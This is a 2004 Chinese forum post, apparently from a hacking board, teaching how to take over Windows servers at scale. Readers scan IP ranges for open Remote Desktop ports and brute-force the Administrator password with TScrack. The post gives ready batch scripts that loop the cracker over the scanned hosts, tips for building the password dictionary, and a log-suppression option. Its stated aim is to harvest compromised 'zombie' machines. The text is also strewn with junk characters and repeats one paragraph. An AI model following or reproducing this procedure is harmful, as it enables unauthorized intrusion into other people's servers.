|
作者:霜风 QQ:14226581
9 b1 m, ?- l5 \终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
# T: k: v0 |* J6 g r0 d9 O这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
* t# l. I- X. r! R4 b& B首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:! M6 ^5 c9 b: H+ o
先打开superscan3如图11 q$ q( O2 \8 p9 O( O9 e8 q
" E. E# D. R0 E7 I& N此主题相关图片如下:2 J6 c& u; |, `: }! K+ u2 N ]
, U( X$ |7 ?8 _
9 j! P& \/ c2 H( L; v接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
; P$ S/ I/ s( C+ L0 Q
/ o4 A2 `( W! ]* z8 o- V3 C此主题相关图片如下:7 k, L' s, W ]8 C! ~+ b4 X
* S9 t* t( d' e7 K
& X. p5 S* r) l8 d7 J2 H然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
0 O" n6 j# ?5 z) j T* A7 s8 }这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3/ G4 D; i8 J* e# v3 ~& t
0 b: a( Y u' A9 G. e# D& @此主题相关图片如下:" B# r# P) k6 m
# w* R: J% v# z- h9 m* T( y: _1 ?6 y
& W7 K* N7 A, T“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。8 _# l7 `1 ~" \8 m0 C3 ?
, ?; [( A3 O6 @2 G. b! c# o此主题相关图片如下:
$ ?2 ~7 M0 t0 J8 ]+ N0 W % y [' C$ y. p
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5/ _& ^ B6 O6 B* f, U0 T% I
( u; C% h+ _- l
此主题相关图片如下:. ]; m1 H6 C6 W: {6 M5 Q# y+ ~! v2 d
; h, }2 I2 l& @- [% h
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
% {. O$ L; R$ ]+ x$ z7 _所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
% Q! q% [( X% h# l1 t, t7 \9 WTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。. X. M6 Z( \/ N- ^1 L9 a
此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。. R6 ^1 E3 k& Y5 S
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:; r) ?- Z( e+ O3 s, I' b
-h : Print usage help and exit- v" C6 i4 k$ v% J# H
-V : Print version info and exit9 L* `: L' f5 d0 G, F8 z+ a
-s : Print chipher strenght info and exit% k! ?) |5 {6 D8 Y9 ]6 C( r
-b : Enable failed password beep
4 s- n: }+ D' l; `( g9 N" D1 k-t : Use two simultaneous connections [EXPERIMENTAL]/ ?; I- }7 f D8 N5 D) U
-N : Prevent System Log entries on targeted server+ x2 G: o# F( O" a) u7 \
-U : Uninstall tscrack and remove components
- C' _5 m' E8 E0 {-f <number> : Wordlist entry to start cracking with' e8 [/ F0 _% ~% e
-F <delay> : Sampling Frequency (Delay between samples in ms)
) K3 B3 w. J& j4 o-l <user> : Account name to use, defaults to Administrator! x( Z( l: F) Z& G1 b
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted
5 }4 V) g% d# _. F m q. Y-p <password> : Use <password> to logon instead of wordlist/blank pass
8 w. v* t5 v- H3 v/ h; P4 X: N# ], {- W-D <domain> : Specify domain to attempt logon to $ {8 z o% \- ]& Z
9 M( b% x8 T* p& @# N
; c3 d8 v0 {8 W8 u9 x4 |& A我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
& o8 }' ^7 E8 t& h0 L4 T-h : 显示使用帮助然后退出3 a2 G$ @1 t% Y
-V : 显示版本信息然后退出
$ g- w5 V: A2 V5 F j-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)* m9 `* Y# }/ x2 g. z! T$ y" {5 n
-b : 密码错误时发出声音$ C+ U& g. J# Z* N" r+ M" G
-t : 同时发出多个连接,就是多线程。. `& I; d$ m3 D0 X
-N : Prevent System Log entries on targeted server: ^/ P* p1 K: k, D S% v- h
-U : 卸载移除tscrack组件。* E4 z( [% h; J* _' w2 x. N
-f <number> : 使用-F后面的密码。9 k1 n; m) P' A9 d- j
-F <delay> : 间隔时间(频率)
1 S2 t! l( A" d6 q, A1 }5 p, W-l <user> : 使用-L后面的用户名
; ^0 @3 Z' [+ {4 V% l6 U-w <wordlist> : 使用-W后面的字典# c) B& |7 K8 S6 N. @5 Z
-p <password> : 使用-W后的密码
5 G) I* l: j3 b( E0 B( Y B-D <domain> : 登陆主页面?! N3 |9 v( b! n; t: B
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:" [! Y# O9 B, ]" y7 o
@if not exist IpcScan.txt goto noscan
, E1 O+ j3 a& T- P, n@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
- J! W" C, A! C" [3 P# R:noscan
8 ^5 R6 O1 D" l. K& R@echo 3389.txt no find or scan faild 
1 F0 v& W h. F' e; }8 p这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)) ]+ P7 |9 L/ L" U$ c& `7 v3 C+ Q
保存后把后错名改为BAT就可以了。
' z b" |- X/ i; H& Y+ A, f1 K- y还写一个BAT,名字为HACK.BAT,代码如下:
6 O: |( X: e/ h1 g@if not exist tscrack.exe goto noscan
) a& j, d' r* |; z% I( l' x: N@tscrack %1 -l administartor -w pass.dic >>rouji.txt/ S6 Q* ~, S1 G' g% X
:noscan6 M. H. J j4 x
@echo tscrack.exe no find or scan faild
" J/ K$ ]. S4 k$ v1 L! y这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
2 z8 a. f. S4 X2 w; O# \) }制作方法如上。
0 U3 N l) E; M7 u# U1 ?& e4 `1 k7 o然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
+ R- D. R* E7 P0 z. g# T' g2 G4 n# b v- C( Q: I7 ?: O, }
此主题相关图片如下:! n: e& k+ ^! R i
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
! B$ H8 U0 H" N; G1 K5 Z" q最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
; Q3 n! X4 L1 M3 y2 S% h* R5 m- ]' j* q2 B/ k. d- x/ m
此主题相关图片如下:
7 G) Q0 m7 K0 I) T$ h/ \
- a3 e5 |8 f2 F, f+ }0 I8 A, P怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
& K$ W% Z: o: U- d, i最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
